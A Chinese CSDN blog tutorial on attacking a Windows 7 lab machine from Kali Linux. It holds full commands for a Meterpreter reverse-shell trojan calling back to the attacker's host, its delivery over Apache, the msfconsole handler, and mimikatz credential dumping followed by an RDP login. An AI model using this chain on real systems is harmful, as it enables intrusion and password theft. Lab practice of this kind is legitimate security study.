使用kali中的msf渗透windows系统:

本文详细介绍了如何在KaliLinux环境中利用msfvenom生成木马、通过Apache服务传播、利用Meterpreter获取目标系统信息,并展示了如何使用mimikatz获取密码以实现远程登录。注意,所有操作仅为靶机测试,禁止在实际环境中滥用。
摘要由CSDN通过智能技术生成

环境准备:

kali:192.168.13.128
win7:192.168.13.136

1、使用msfvenom生成名为cmd的木马文件:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.13.128 lport=5555 -f exe > /var/www/html/cmd.exe

其中lhost=攻击机ip、lport=监听端口、-f 后门文件类型、>/后门文件保存路径

请添加图片描述

2、在/var/www/html目录下开启apache服务,并检查是否成功开启:
/etc/init.d/apache2 start

/etc/init.d/apache2 status

(出现active running表示成功开启)

请添加图片描述

3、在靶机上访问攻击机IP,可以看到生成的木马文件,下载到本地:

(此步骤想说明的是,攻击者可通过钓鱼网站、邮件或者社会工程学等方式诱导受害人下载木马文件等)

请添加图片描述

4、开启postgresql服务,并检查服务是否开启:

请添加图片描述

5、开启msfconsole,设置攻击模块如下:
use exploit/multi/handler

set lhost 攻击者IP

set lport 监听端口

set payload windows/meterpreter/reverse_tcp

show options

run

请添加图片描述请添加图片描述

运行之后,然后就等待靶机中招了

请添加图片描述

当靶机运行该木马文件(cmd.exe)后,攻击机直接获取到meterpreter:

请添加图片描述

6、进入命令行shell,出现乱码输入chcp 65001即可解决,然后我们就可以查看到靶机相关信息

请添加图片描述

这里给大家提供一些meterpreter常用命令:

请添加图片描述

7、当前期在信息收集时得知开放3389端口,并且我们已经拿到meterpreter后,我们可以使用mimikatz工具获取明文密码:

链接:百度网盘:mimikatz.exe
提取码:428y

上传mimikatz.exe到C:下

在这里插入图片描述

提升至管理员权限 privilege::debug

在这里插入图片描述

读取铭文用户名和密码 sekurlsa::logonpasswords

在这里插入图片描述

接下来就可以进行远程连接 rdesktop 靶机IP,登录到靶机进行下一步的操作了

请添加图片描述

注:此博客仅用于靶机测试,切勿对他人电脑进行测试!!!

  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值